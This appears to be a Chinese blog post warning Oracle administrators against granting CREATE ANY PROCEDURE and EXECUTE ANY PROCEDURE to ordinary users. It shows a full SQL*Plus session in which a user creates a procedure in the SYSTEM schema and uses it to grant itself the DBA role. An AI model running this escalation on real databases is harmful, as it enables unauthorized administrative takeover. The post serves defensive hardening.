??給一般用戶授 create any procedure、execture any procedure 這2個(gè)權(quán)限是很不安全的事。
因?yàn)槭跈?quán)后,通過(guò)一些處理,該用戶可以取得dba權(quán)限,請(qǐng)一定注意。
?
下面是實(shí)驗(yàn)過(guò)程:
SQL> create user hacker identified by bbk;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure,execute any procedure to hacker;
Grant succeeded.
?
?
SQL> conn hacker/bbk
Connected.
SQL> show user
USER is "HACKER"
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
?
SQL> create procedure system.h1(h1_str in varchar2) as
2 begin
3 execute immediate h1_str;
4 end;
5 /
Procedure created.
?
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
?
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
UNLIMITED TABLESPACE
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
?
SQL> conn hacker/bbk
Connected.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
...................................
161 rows selected.
?
SQL> select * from session_roles;
ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
?
?
Oracle: 禁忌給一般用戶授權(quán)create any procedure、execute any procedure
更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號(hào)聯(lián)系: 360901061
您的支持是博主寫(xiě)作最大的動(dòng)力,如果您喜歡我的文章,感覺(jué)我的文章對(duì)您有幫助,請(qǐng)用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長(zhǎng)非常感激您!手機(jī)微信長(zhǎng)按不能支付解決辦法:請(qǐng)將微信支付二維碼保存到相冊(cè),切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對(duì)您有幫助就好】元
